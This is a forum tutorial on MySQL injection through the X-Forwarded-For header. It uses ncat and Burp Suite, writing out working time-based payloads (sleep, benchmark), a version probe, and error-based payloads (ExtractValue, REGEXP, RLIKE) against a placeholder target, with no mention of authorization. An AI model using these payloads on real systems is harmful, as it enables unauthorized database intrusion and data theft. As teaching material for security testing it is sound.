GreySec Forums

Full Version: [Tutorial] Request header MySQL injection using netcat and burp suite
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Request header MySQL injection using netcatand burp suite

Credits: Rouge Coder
Source: IntoSec


The scope of this tutorial is not to teach SQL injection. It's only do give you an idea on an efficient approach for executing SQL injections using the request headers. It expected that you, the reader, has at least some basic knowledge about request headers, SQL injection and command line interface. If you need to learn more about SQL injection methods please refer to tutorials written to teach this.

Verify Vulnerability

Before we begin we need to make sure that the header we're attacking actually is vulnerable. The best way to do this is touse time based injection. I like to use the ncat command for this purpose.

I first run this command...
Code:
echo "GET / HTTP/1.0\r\nX-Forwarded-For: x' or sleep(4) -- -\r\nConnection: close\r\n\r\n" | ncat target 80

... followed by this
Code:
$ echo "GET / HTTP/1.0\r\nX-Forwarded-For: x' or sleep(0) -- -\r\nConnection: close\r\n\r\n" | ncat target 80

If there's a large difference in the time it takes before the HTML source is printed, it means that our sleep() command wasexecuted on the database server.

If the sleep command doesn't work, you can try using benchmark() instead
Code:
$ echo "GET / HTTP/1.0\r\nX-Forwarded-For: x' or benchmark(15000000,md5(0x3a)) -- -\r\nConnection: close\r\n\r\n" | ncat target 80

Now that we have verified that our commands are being executed on the server, it's time to move on.

Determine The Version

The first thing we want to do is to determine what database version we're working with. The reason for this has to do withthe fact that we need to know if the information_schema table is present or not. This table is present in MySQL 5.

So how do we go about doing this? We continue our time based attack.
Code:
$ echo "GET / HTTP/1.0\r\nX-Forwarded-For: x' or (if(mid(@@version,1,1)=5),sleep(4),null)) -- -\r\nConnection: close\r\n\r\" | ncat target 80

What this does is that it triggers the sleep function if the first character in the version number is 5. If not, it will loadinstantly.

You can now start looking for ways to attack the server.

Determine Attack Method

We have so far verified that the header is vulnerable and that the server is running MySQL 5. It's now time to determinewhat type of SQL injection attack we will use. We already know that it's vulnerable to time based injection. But this is theworst method that exists, so we look for other methods.

Load up Burp Suite now

Make Burp Suite intercept the request and press Ctrl + R. This will send the request to Repeater. You will see that the tabname Repeater highlights in orange. The repeater is divided into two parts. One to send requests, and one to view theresponse, which makes header tampering extremely easy.

[Image: W37Hntp.png]

[Image: Ofv3jS3.png]

So now that we have our request loaded into the repeater we tamper the same header as we used with netcat, and it can bea good idea to send one or two basic time based injection, like the first ones we used, just to verify that the code is executed.

When that is done we can start the process of trying to generate errors. There are several methods to do this but myfavorite ones are ExtractValue(), REGEXP and RLIKE. The are, short, easy to remember and takes a second to write.

ExtractValue()
Code:
X-Forwarded-For: x' and ExtractValue(null,concat(0x3a,version())) -- -

REGEXP / RLIKE (RLIKE is just an alias of REGEXP)
Code:
X-Forwarded-For: x' REGEXP '(' -- -
X-Forwarded-For: x' RLIKE '(' -- -

If you get any output, start trying to see if you can use it to extract data. If you can, well then you are lucky. Because if youdon't get any error messages or you're not able to display anything into your messages. Then the only thing that's left is,yes, time base injection.

I'm not going to get into any further details about this now.

Tutorial Resources
* Download burp suite: http://portswigger.net/burp/

MySQL Docs:
* ExtractValue()
* REGEXP / RLIKE
* BENCHMARK()
* SLEEP()